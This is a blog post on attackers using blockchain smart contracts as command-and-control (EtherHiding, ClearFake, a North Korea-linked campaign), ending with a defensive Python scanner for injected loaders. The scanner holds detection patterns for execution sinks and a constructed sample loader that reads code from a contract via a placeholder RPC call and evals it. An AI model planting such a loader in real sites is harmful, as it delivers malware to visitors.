A Decentralized Center for Control: The Blockchain as a C2
// Blockchain has come into the spotlight again in recent months due to several C2-based attacks executed through the use of blockchain smart contracts. I will explore the recent attacks and observe the evolution of the blockchain as a command and control and where this can lead.
Blockchain has been a fascination of mine for several years now. I first learned about it back in 2021, in the middle of the crypto boom that took over Twitter with NFTs and meme coins. I did not see it as a way to make a quick buck like so many others did. What caught my attention was the potential of the technology itself and the wider applications it could have.
Lately though, I have been seeing some news that introduced me to a new way to view the blockchain. Attackers have started to use the blockchain as a place to hide and run their command and control infrastructure. So let me walk you through what that means and why it should matter to you.
The Current Landscape
Ever since ChatGPT entered the technological landscape, many crypto fanatics, also known as “crypto bros”, moved on to the next shiny thing, AI. This left blockchain technology to fade into the background. To be honest, it was already overlooked as a serious piece of technology even during its peak, buried under all the hype around rug pulls, Elon Musk’s weird endorsements, and Coffeezilla’s exposure of Logan Paul’s scam coin CryptoZoo.
But the technology never went away. And in recent months we have seen a handful of cybersecurity incidents that use the blockchain itself as an attack vector. Not to steal coins or drain wallets, which is what most people would expect, but to hide malicious code in a place that is almost impossible to take down.
To understand why that is such a big deal, we first need to talk about what a C2 actually is.
What is a C2?
C2 is short for command and control. When an attacker compromises a machine, whether it is a laptop, a server, or a phone, they usually need a way to keep interacting with it, and rarely for good reasons. They need to send it new commands, tell it what to steal, and collect whatever data comes back. That is what a C2 is: a place from which attackers can control infected devices.
You can think of it like a remote control for every machine an attacker has broken into. The infected machine reaches out to the C2, asks “what do you want me to do”, and the C2 answers. This back and forth is the heartbeat of most modern attacks. Without it, a piece of malware sitting on your computer is mostly stuck doing whatever it was told to do at the start and nothing more.
The Problem With Traditional C2
There is a bit of a caveat however… the C2 has to live somewhere. Traditionally it lives on a server with an IP address, or behind a URL. However, anything with an address can be found, and anything that can be found can be taken away.
When defenders discover a C2 server, they can do a few things. They can ask the hosting provider to shut it down. They can get the domain registrar to seize the domain. They can add the IP address and domain to block lists so that no machine on a protected network can reach it. Law enforcement can even seize the physical hardware in some cases.
In other words, traditional C2 has a single point of failure. Pull the plug on the server or take the domain, and the attacker loses contact with everything they worked so hard to infect. This is a real weakness, and attackers have spent years trying to work around it with tricks like rapidly changing domains and bulletproof hosting. None of those tricks fully solve the problem though, because at the end of the day there is still someone you can call to take it down.
So what if there was no one to call?
Enter the Blockchain
This is where the blockchain comes in.
A public blockchain like Ethereum or BNB Smart Chain has a few properties that happen to be perfect for an attacker who wants a C2 that cannot be killed. It is decentralized, which means the data is copied across thousands of computers all over the world with no central owner. It is immutable, which means that once something is written to it, no one can quietly delete it, not the developers, not a court, and not law enforcement. And it is open, which means anyone can read from it at any time.
Now flip those properties around and look at them from a defender’s point of view. There is no hosting provider to email. There is no domain to seize. There is no single machine to unplug. The malicious data lives on the same network that powers apps used by millions of honest people. You cannot take down Ethereum to stop one attacker any more than you can shut off the internet to stop one website.
That is the core idea. The blockchain gives attackers a place to store instructions that is always online, anonymous to publish to, and nearly impossible to remove.
EtherHiding
The technique that brings this idea to life is known as EtherHiding. It was first documented by a team at Guardio Labs back in October of 2023.
Here is how it works in plain terms. Attackers first compromise a normal website, more often than not, a WordPress site, and inject a small piece of JavaScript into it. That small piece of code does not contain the actual attack. Instead, it reaches out to a smart contract on the blockchain and asks it for the next stage of the payload. The contract hands back the malicious code, and the victim’s browser runs it.
The clever part is in the details. Reading data from a smart contract can be done with a simple call that costs no gas and creates no transaction. That means an attacker can pull their payload thousands of times without leaving an obvious trail on the chain. When they want to change what the malware does, they send one cheap transaction to update the contract, and every compromised site instantly starts serving the new code. The reported cost for one of these updates is somewhere between a quarter and a dollar and a half.
In the original campaign, known as ClearFake, this was used to show visitors a fake browser update warning. If you clicked it, you ended up with an information stealer such as Lumma or RedLine sitting on your machine, quietly collecting your passwords and crypto wallets. The same approach has since spread, with one group tracked as UNC5142 reported to have compromised around fourteen thousand WordPress sites using this method.
You can read the original reporting and some follow up coverage here:
- https://thehackernews.com/2023/10/binances-smart-chain-exploited-in-new.html
- https://www.bleepingcomputer.com/news/security/hackers-use-binance-smart-chain-contracts-to-store-malicious-scripts/
When Nation States Take Notice
A technique being used by financially motivated criminals is one thing. A technique being adopted by a government is another thing entirely. In October of 2025, the Google Threat Intelligence Group reported that they had been tracking a North Korea linked group, which they label UNC5342, using EtherHiding since February of that same year. As far as anyone can tell, this was the first time a nation state actor picked up the technique at scale.
Their campaign is worth describing because it shows how social engineering and blockchain abuse fit together. The attackers approach software developers on LinkedIn while pretending to be recruiters. They move the conversation over to Telegram or Discord, then ask the target to run some code as part of a fake job assessment. That code uses EtherHiding to pull malware called JADESNOW from the blockchain, which then loads a JavaScript version of a tool called INVISIBLEFERRET. The end goal in many cases was simple. Steal the developer’s data and drain their cryptocurrency.
Google’s full writeup is here:
There is also a good summary of how this turns the blockchain into what some have started to call an unkillable C2:
Why This Is So Hard to Stop
By now the problem should be clear. The usual playbook for shutting down an attacker’s infrastructure simply does not apply here. You cannot seize the contract. You cannot take down the chain. The data is going to stay there for as long as the blockchain itself exists.
That does not mean defenders are helpless, but it does mean the fight has to move somewhere else. Instead of removing the C2, the focus shifts to the two ends of the attack. On one end, you clean up and protect the websites that get compromised in the first place, since the malicious JavaScript still has to be injected somewhere. On the other end, you protect the actual machine, catching the malware when it tries to run no matter where it came from. The thing you cannot do anymore is the one thing that used to work best, which was pulling the plug at the source.
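To make that shift concrete, here is an added example (my own, not code from Guardio Labs or Google) of a small scanner for the website end of the problem. It scores each inline script on a page: a blockchain read by itself is how honest dapps work, but a read whose result flows into eval or a similar execution sink is the shape the loaders described above take. The sample pages are constructed, and the patterns are heuristics for triage, not a signature.

```python
import re
from dataclasses import dataclass, field

# Read-only chain access: JSON-RPC methods and common client libraries.
# Such reads cost no gas and leave no transaction, so the injected page
# content, not the chain, is where a defender can look.
CHAIN_READ = re.compile(
    r"eth_call|eth_getStorageAt|ethers\.(?:Contract|providers|JsonRpcProvider)|new\s+Web3\s*\(", re.I)
# Sinks that turn fetched data into running code.
EXEC_SINK = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*['\"]script['\"]", re.I)
# Decoding helpers usually found between the read and the sink.
DECODE = re.compile(r"hexToUtf8|atob\s*\(|fromCharCode|decodeURIComponent", re.I)

@dataclass
class Finding:
    score: int
    reasons: list = field(default_factory=list)

def score_script(js: str) -> Finding:
    """Heuristic: a chain read alone is benign (wallet UIs do it constantly);
    a chain read next to an execution sink is the EtherHiding-style pattern."""
    f = Finding(0)
    read, sink = CHAIN_READ.search(js), EXEC_SINK.search(js)
    if read:
        f.score += 1; f.reasons.append(f"chain read: {read.group(0)}")
    if sink:
        f.score += 1; f.reasons.append(f"exec sink: {sink.group(0)}")
    if read and sink:
        f.score += 3; f.reasons.append("chain read and execution sink in the same script")
    if DECODE.search(js):
        f.score += 1; f.reasons.append("payload decoding helper present")
    return f

def scan_html(html: str, threshold: int = 4) -> list:
    """Return findings for inline <script> bodies at or above the threshold."""
    bodies = re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I)
    return [f for f in (score_script(b) for b in bodies) if f.score >= threshold]

# Constructed samples (not from any real campaign): a legitimate balance
# lookup, and a loader skeleton that decodes a contract read and executes it.
BENIGN = "<script>const p = new ethers.JsonRpcProvider(RPC); p.getBalance(a).then(show);</script>"
SUSPECT = ("<script>fetch(RPC, {method: 'POST', body: JSON.stringify({method: 'eth_call', "
           "params: [{to: C, data: D}, 'latest']})}).then(r => r.json())"
           ".then(j => eval(hexToUtf8(j.result)));</script>")

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, [(f.score, f.reasons) for f in scan_html(page)])
```

Run it against a crawl of your own sites; the point is to catch the injection at the place it still has to live, since the contract behind it will not be going anywhere.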
It is also worth pointing out that this puts the people who run blockchains in an awkward spot. The same property that makes a chain trustworthy, the fact that no single party can change or remove data, is exactly the property the attackers are leaning on.
Closing Thoughts
When I first got into blockchain in 2021, I was drawn to the idea that you could build systems no single person controls. I’m still drawn to the core philosophy and idea behind it. But powerful ideas rarely come with a label telling you how they will be used. The very thing that makes a blockchain resistant to censorship and seizure is the same thing that makes it such a comfortable home for an attacker who never wants their C2 to go down.
I do not think this is a reason to be afraid of the technology, and it is certainly not a reason to write it off. It is a reminder that every tool we build can be turned in a direction we did not intend, and that the people defending these systems have to think just as creatively as the people attacking them.
If you made it this far, thank you for reading. If this kind of thing interests you, I would encourage you to read through the reports I linked above, since the technical details are far richer than what I could fit here. And the next time someone tells you the blockchain is just a way to get rich quick, you will know there is a stranger and more serious story hiding underneath.